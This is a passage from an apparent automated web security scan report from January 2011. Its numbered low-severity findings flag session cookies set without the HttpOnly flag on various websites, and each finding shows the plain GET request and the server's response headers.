User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 14:24:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=etd10v55qnlha3bgxe4zk255; path=/
Set-Cookie: chk_support=check; path=/
Set-Cookie: SOU_CustID=SOU13989; path=/
Set-Cookie: SOU_CartID=SOU-9E35923E-12511; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 26388


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>Soundings Online Catalog</title>
       <meta name="GENERATOR" content="Microsoft Visual Studio.NET 7.0">
       <me
...[SNIP]...

14.116. http://www.beirut.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PHPSESSID=ael7hgofe5550n3tan4s3cqg47; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:49:26 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: PHPSESSID=ael7hgofe5550n3tan4s3cqg47; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...

14.117. http://www.beneteaucountdown.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.beneteaucountdown.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • PHPSESSID=fe1fba1be91e1e0b7e6fc4c555aa972d; path=/
  • BBF_Login=deleted; expires=Mon, 25-Jan-2010 13:12:46 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.beneteaucountdown.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:12:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=fe1fba1be91e1e0b7e6fc4c555aa972d; path=/
Expires:
Cache-Control:
Pragma:
Set-Cookie: BBF_Login=deleted; expires=Mon, 25-Jan-2010 13:12:46 GMT
Connection: close
Content-Type: text/html; charset=windows-1252
Content-Length: 21847

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

14.118. http://www.benjaminsterling.com/experiments/jqShuffle/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.benjaminsterling.com
Path:   /experiments/jqShuffle/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PHPSESSID=ef8d21beed05ebe4cdb407a9f1c8923a; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /experiments/jqShuffle/ HTTP/1.1
Host: www.benjaminsterling.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 25 Jan 2011 13:13:29 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_fcgid/2.3.5 Phusion_Passenger/2.2.15 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
X-Pingback: http://benjaminsterling.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=ef8d21beed05ebe4cdb407a9f1c8923a; path=/
Last-Modified: Tue, 25 Jan 2011 13:13:29 GMT
Location: http://benjaminsterling.com/experiments/jqShuffle/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


14.119. http://www.boats.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.boats.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
  • boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
  • boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
  • boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
  • boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
  • boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
  • JSESSIONID=b7lQLae-ucE5; path=/
  • Apache=10.71.0.26.1295913435664098; path=/; expires=Wed, 26-Jan-11 23:57:15 GMT; domain=.boats.com
  • cuid=3425338186237716693; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
  • SL_Audience=870|Accelerated|799|1|0;Expires=Wed, 23-Jan-13 23:57:15 GMT;Path=/;Domain=.boats.com
  • SL_UVId=2B0DFE48C52A7F5A;path=/;
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.boats.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:57:15 GMT
Server: Apache
Set-Cookie: Apache=10.71.0.26.1295913435664098; path=/; expires=Wed, 26-Jan-11 23:57:15 GMT; domain=.boats.com
Cache-Control: private
Content-Language: en-US
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: boats.listing_search_country_id=100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: boats.listing_search_country_id_us=100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: boats.active_sub_domain_listing_search_country_id=US; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: boats.listing_search_country_id=100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: cuid=3425338186237716693; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: JSESSIONID=b7lQLae-ucE5; path=/
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: SL_Audience=870|Accelerated|799|1|0;Expires=Wed, 23-Jan-13 23:57:15 GMT;Path=/;Domain=.boats.com
Set-Cookie: SL_UVId=2B0DFE48C52A7F5A;path=/;
Set-Cookie: SL_NV1=1|1;Expires=Wed, 26-Jan-11 11:57:15 GMT;Path=/;Domain=.boats.com
X-SL-CompState: TouchUp


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

14.120. http://www.careersingear.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.careersingear.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PHPSESSID=7d38163661ab3fa45bdf4f9462796ad7; path=/; domain=.careersingear.com
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.careersingear.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:57:49 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.9 mod_python/3.2.8 Python/2.4.3
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=7d38163661ab3fa45bdf4f9462796ad7; path=/; domain=.careersingear.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 29481

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

14.121. http://www.carmax.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.carmax.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • KmxSession_0=cf2c1e2a-8b04-4848-b9f3-7d2c38c4b661; domain=.carmax.com; path=/
  • KmxCurrSession_0=AB=False&StartDate=1/24/2011 11:04:32 AM&IsIntranet=False&IsHomeOffice=False; domain=.carmax.com; path=/
  • KMXCOM=UPIJWISKMXCOMWEB052T0x0000000e_0xc6b22d1fCOIKM; expires=Mon, 24-Jan-2011 17:04:31 GMT; path=/
  • KmxVisitor_0=VisitorID=81b44c0b-cf88-4418-90e8-39a8d968f28d&CookieDate=1/24/2011 11:04:32 AM&Zip=; domain=.carmax.com; expires=Tue, 24-Jan-2012 16:04:32 GMT; path=/
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.carmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: KMXCOM=UPIJWISKMXCOMWEB052T0x0000000e_0xc6b22d1fCOIKM; expires=Mon, 24-Jan-2011 17:04:31 GMT; path=/
Connection: close
Date: Mon, 24 Jan 2011 16:04:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: KmxVisitor_0=VisitorID=81b44c0b-cf88-4418-90e8-39a8d968f28d&CookieDate=1/24/2011 11:04:32 AM&Zip=; domain=.carmax.com; expires=Tue, 24-Jan-2012 16:04:32 GMT; path=/
Set-Cookie: KmxSession_0=cf2c1e2a-8b04-4848-b9f3-7d2c38c4b661; domain=.carmax.com; path=/
Set-Cookie: KmxCurrSession_0=AB=False&StartDate=1/24/2011 11:04:32 AM&IsIntranet=False&IsHomeOffice=False; domain=.carmax.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 68015


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>
   CarMax - Browse used cars and new cars online
...[SNIP]...

14.122. http://www.carsdirect.com/x22

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.carsdirect.com
Path:   /x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • JSESSIONID=6AFA93D77F160D2887EB6A8A80625603.eqapp5-2-worker; Path=/
  • BIGipServercarsdirect_pool=3253211308.0.0000; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /x22 HTTP/1.1
Host: www.carsdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:34 GMT
Server: Apache
Set-Cookie: JSESSIONID=6AFA93D77F160D2887EB6A8A80625603.eqapp5-2-worker; Path=/
Set-Cookie: TRACKER_ID=-1; Domain=.carsdirect.com; Expires=Sat, 23-Jul-2011 16:04:34 GMT; Path=/
Content-Language: en
Content-Length: 156
Vary: Accept-Encoding
Content-Type: text/html
Connection: close
Set-Cookie: BIGipServercarsdirect_pool=3253211308.0.0000; path=/

<link rel="stylesheet" href="http://cdc-img.ibsrv.net/includes/common.css" type="text/css"><html><head><script>document.location="/404error"</script></html>

14.123. http://www.cdearth.com/photo-image-editor.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cdearth.com
Path:   /photo-image-editor.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PHPSESSID=112rl5duvqkmmubehjna1j1ij0; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /photo-image-editor.htm HTTP/1.1
Host: www.cdearth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:05:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=112rl5duvqkmmubehjna1j1ij0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12648


<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"
...[SNIP]...

14.124. http://www.corporatehousing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.corporatehousing.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • ASPSESSIONIDSSRDTQSQ=GHGAKDPCBLMJMEEEJDLHHDIC; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.corporatehousing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 132
Content-Type: text/html
Location: default.asp
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDSSRDTQSQ=GHGAKDPCBLMJMEEEJDLHHDIC; path=/
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:58:13 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="default.asp">here</a>.</body>

14.125. http://www.digitaltips.org/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.digitaltips.org
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • ASPSESSIONIDQACCSATA=CBMAPNKCICCPLJELGPNDBBAG; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.digitaltips.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 13:13:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 15408
Content-Type: text/html
Expires: Tue, 25 Jan 2011 13:12:49 GMT
Set-Cookie: ASPSESSIONIDQACCSATA=CBMAPNKCICCPLJELGPNDBBAG; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><!-- PageID 106 - published
...[SNIP]...

14.126. http://www.diigo.com/post

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.diigo.com
Path:   /post

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • _smasher_session=cdc373a2e1ecd61c7b92bca1b0e323d3; domain=diigo.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /post HTTP/1.1
Host: www.diigo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Tue, 25 Jan 2011 13:14:38 GMT
Content-Type: text/html; charset=utf-8
Connection: close
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Location: https://secure.diigo.com/sign-in?referInfo=http%3A%2F%2Fwww.diigo.com%2Fpost
X-Runtime: 0.00258
Content-Length: 142
Set-Cookie: CHKIO=; domain=.diigo.com; path=/; expires=Fri, 21 Jan 2011 09:14:38 GMT
Set-Cookie: diigoandlogincookie=; domain=.diigo.com; path=/; expires=Fri, 21 Jan 2011 09:14:38 GMT
Set-Cookie: _smasher_session=cdc373a2e1ecd61c7b92bca1b0e323d3; domain=diigo.com; path=/
Cache-Control: no-cache

<html><body>You are being <a href="https://secure.diigo.com/sign-in?referInfo=http%3A%2F%2Fwww.diigo.com%2Fpost">redirected</a>.</body></html>

14.127. http://www.directstartv.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.directstartv.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • PHPSESSID=0vked70odhg1a3p6bv8i242j10; path=/; domain=.directstartv.com
  • Referrer=ds-nat-dtop-dent-ehome-none-directstartvcom-1462b; path=/; domain=.directstartv.com
  • Keyword=deleted; expires=Sun, 24-Jan-2010 16:05:27 GMT; path=/; domain=.directstartv.com
  • EngineID=deleted; expires=Sun, 24-Jan-2010 16:05:27 GMT; path=/; domain=.directstartv.com
  • VisitorID=148575341; expires=Tue, 24-Jan-2012 16:05:28 GMT; path=/; domain=.directstartv.com
  • VisitID=160872488; expires=Tue, 24-Jan-2012 16:05:28 GMT; path=/; domain=.directstartv.com
  • lpd=default; expires=Fri, 25-Mar-2011 16:05:28 GMT; path=/; domain=.directstartv.com
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.directstartv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:05:28 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: PHPSESSID=0vked70odhg1a3p6bv8i242j10; path=/; domain=.directstartv.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: DTV_ISC=0; expires=Mon, 23-Jan-2012 16:05:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: Referrer=ds-nat-dtop-dent-ehome-none-directstartvcom-1462b; path=/; domain=.directstartv.com
Set-Cookie: Keyword=deleted; expires=Sun, 24-Jan-2010 16:05:27 GMT; path=/; domain=.directstartv.com
Set-Cookie: EngineID=deleted; expires=Sun, 24-Jan-2010 16:05:27 GMT; path=/; domain=.directstartv.com
Set-Cookie: VisitorID=148575341; expires=Tue, 24-Jan-2012 16:05:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: Visits=1; expires=Tue, 24-Jan-2012 16:05:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: VisitID=160872488; expires=Tue, 24-Jan-2012 16:05:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: lpd=default; expires=Fri, 25-Mar-2011 16:05:28 GMT; path=/; domain=.directstartv.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

14.128. http://www.dominionenterprises.com/main/do/Privacy_Policy

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dominionenterprises.com
Path:   /main/do/Privacy_Policy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PHPSESSID=bb05b7f7a9c540a99a25d950dbe037b3; expires=Thu, 27 Jan 2011 14:02:50 GMT; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /main/do/Privacy_Policy HTTP/1.1
Host: www.dominionenterprises.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:02:50 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=bb05b7f7a9c540a99a25d950dbe037b3; expires=Thu, 27 Jan 2011 14:02:50 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 14:02:50 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Connection: close
Content-Type: text/html
Content-Length: 33701

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Privacy Policy</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-
...[SNIP]...

14.129. http://www.dominionenterprises.com/main/do/Terms_of_Use

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dominionenterprises.com
Path:   /main/do/Terms_of_Use

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • PHPSESSID=eeae8ce201e707a408052831b7f8c270; expires=Thu, 27 Jan 2011 14:02:50 GMT; path=/
  • TSa27990=b9a249217f4497bd6bb8b0395db307ebc6392f532a5a5c034d3eced29c5eca85d241baed; Path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /main/do/Terms_of_Use HTTP/1.1
Host: www.dominionenterprises.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:02:50 GMT
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=eeae8ce201e707a408052831b7f8c270; expires=Thu, 27 Jan 2011 14:02:50 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 14:02:50 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Connection: close
Content-Type: text/html
Set-Cookie: TSa27990=b9a249217f4497bd6bb8b0395db307ebc6392f532a5a5c034d3eced29c5eca85d241baed; Path=/
Content-Length: 45884

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Terms of Use</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-eq
...[SNIP]...

14.130. http://www.dzone.com/links/add.html

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dzone.com
Path:   /links/add.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • JSESSIONID=aaaH3fDCwPO6Ah760t92s; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /links/add.html?url={u}&title={t} HTTP/1.1
Host: www.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 13:14:07 GMT
Server: Apache/2.2.11 (Unix) DAV/2 SVN/1.5.5 Resin/4.0.4 PHP/5.2.13
Cache-Control: private, max-age=1
Location: http://www.dzone.com/links/login.html;jsessionid=aaaH3fDCwPO6Ah760t92s
Content-Length: 108
Set-Cookie: JSESSIONID=aaaH3fDCwPO6Ah760t92s; path=/
Content-Type: text/html; charset=utf-8
Expires: Tue, 25 Jan 2011 13:14:08 GMT
Vary: Accept-Encoding,User-Agent
Connection: close

The URL has moved <a href="http://www.dzone.com/links/login.html;jsessionid=aaaH3fDCwPO6Ah760t92s">here</a>

14.131. http://www.ebayinc.com/content/press_release/ebay_selects_joomla_open_source_to_foste

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ebayinc.com
Path:   /content/press_release/ebay_selects_joomla_open_source_to_foste

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • JSESSIONID=56B7E2F4F643F8C3234B643523676F33; Path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/press_release/ebay_selects_joomla_open_source_to_foste HTTP/1.1
Host: www.ebayinc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:05:24 GMT
Set-Cookie: JSESSIONID=56B7E2F4F643F8C3234B643523676F33; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Content-Length: 19418


                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml" xml:l
...[SNIP]...

14.132. http://www.experthost.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.experthost.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • PHPSESSID=ug8lo0eso5l1caor5e6snp0n32; path=/
  • SN47e3b11e7ddd7=ug8lo0eso5l1caor5e6snp0n32; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.experthost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:13:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=ug8lo0eso5l1caor5e6snp0n32; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, must-revalidate
Pragma: no-cache
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Set-Cookie: SN47e3b11e7ddd7=ug8lo0eso5l1caor5e6snp0n32; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12206


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...

14.133. http://www.forrent.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.forrent.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PHPSESSID=8ct7fdk873duftnhmjoh7oems5; path=/, test_element_id=0; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.forrent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:02:36 GMT
Server: Apache
Set-Cookie: PHPSESSID=8ct7fdk873duftnhmjoh7oems5; path=/, test_element_id=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
